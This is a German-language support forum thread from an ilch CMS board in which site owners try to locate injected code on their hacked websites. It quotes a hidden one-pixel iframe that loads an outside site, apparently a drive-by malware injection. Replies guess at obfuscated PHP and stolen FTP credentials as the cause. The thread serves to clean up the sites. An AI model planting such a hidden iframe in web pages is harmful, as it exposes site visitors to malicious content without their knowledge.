ilch Forum » Ilch Clan 1.1 » Fehlersuche und Probleme » Seite atakiert

Geschlossen
  1. #1
    User Pic
    Bladezero Mitglied
    Registriert seit
    07.05.2008
    Beiträge
    128
    Beitragswertungen
    0 Beitragspunkte
    Hi,
    und zwar hatte ich gestern schonmal da Problem für die Seite www.nosterscrew.de geschildert.

    Jetzt ist das Problem das ich das script was sich einbindet gefunden habe.Teilweise auf vereinzelnten Seiten könnte ich den Fehler beheben.Problem ist nur ich finde den letzten Code nicht.Wenn ich auf die Seite gehe und mir den Quelltext anzeigen lasse dann das hier suche :

    <iframe src="http://stxstats.com/" width="1" height="1" frameborder="0"></iframe>

    findet er ihn aber.Ich habe bald jede Datei durch kann es aber absolut nicht finden.Kann mir jemand sagen wo es eventuell drin sein kann?

    Alle index.htm und php sind leider durch.Komme echt nicht mehr klar mit dem scheiss.

    betroffene Homepage: fahrschule-ulas.de
    0 Mitglieder finden den Beitrag gut.
  2. #2
    User Pic
    Mairu Coder
    Registriert seit
    16.06.2006
    Beiträge
    15.334
    Beitragswertungen
    386 Beitragspunkte
    Also entweder in der eigenen Seite, die du als Startseite eingebunden hast, in der class/design.php, contents/self.php oder class/tpl.php müsste es eigentlich sein.
    Und auch immer mal ein Blick auf die FAQ werfen. | Mairus Ilchseite
    0 Mitglieder finden den Beitrag gut.
  3. #3
    User Pic
    Bladezero Mitglied
    Registriert seit
    07.05.2008
    Beiträge
    128
    Beitragswertungen
    0 Beitragspunkte
    Leider in keinen von den dreien.Ich bin echt damit am verzweifeln irgendwo muss der ... ja stehen.Gibt es ja garnicht.
    0 Mitglieder finden den Beitrag gut.
  4. #4
    User Pic
    BAMBOIHH Mitglied
    Registriert seit
    22.05.2008
    Beiträge
    221
    Beitragswertungen
    23 Beitragspunkte
    Wie wäre es, wenn Du mal deine index.php postest.
    Wie ich Dir schon in Deinem anderen Thread geschrieben hatte, stand ich vor dem gleichen Problem!
    Der iFrame-Tag war bei mir auch nicht "einfach so" bzw. eindeutig sichtbar!
    Er wurde bei mir verschlüsselt bzw. generiert aus (für mich damals) kryptischen php-Script-Häppchen reingehackt.


    Ach noch etwas - sind Deine ganzen Seien auf dem gleichen Server?


    Zuletzt modifiziert von BAMBOIHH am 04.02.2011 - 18:51:06
    0 Mitglieder finden den Beitrag gut.
  5. #5
    User Pic
    DCBlaze Mitglied
    Registriert seit
    06.02.2011
    Beiträge
    1
    Beitragswertungen
    0 Beitragspunkte
    Hallo,

    ich bin auf das gleiche Problem gestoßen. Auf 2 verschiedenen Seiten, welche beide beim selben Provider liegen (aber verm. auf unterschiedlichen Servern) wurde das oben genannte iFrame eingebettet. Betroffen scheinen nur die index-Seiten zu sein.

    Ich stehe bereits im Kontakt mit dem Provider. Die meinen, dass mein Rechner evtl. durch Viren ausgespäht wurde. Das glaube ich zwar nicht, trotzdem werde ich nun mittels Live-CD und kostenpflichtigen Virenscanner mein System prüfen.
    Ich glaube eher das es ein Server-seitiges Problem ist, aber nun ja.

    Oder weiß von euch jemand wie es zu diesen iFrame Einbindungen kommt?

    EDIT: Bin zwar noch nicht mit meinem Scan durch, aber mir ist beim herstellen einer FTP - Verbindung aufgefallen, dass eine Datei von Filezilla modifiziert ist (mingwm10.dll). Vielleicht hat es damit zu tun?
    Ich werde auf alle Fälle weiterrecherchieren. Wenn ich was gefunden habe, lass ich es euch wissen.

    Gruß
    DCBlaze


    Zuletzt modifiziert von DCBlaze am 07.02.2011 - 00:31:11
    0 Mitglieder finden den Beitrag gut.
Geschlossen

Zurück zu Fehlersuche und Probleme

Optionen: Bei einer Antwort zu diesem Thema eine eMail erhalten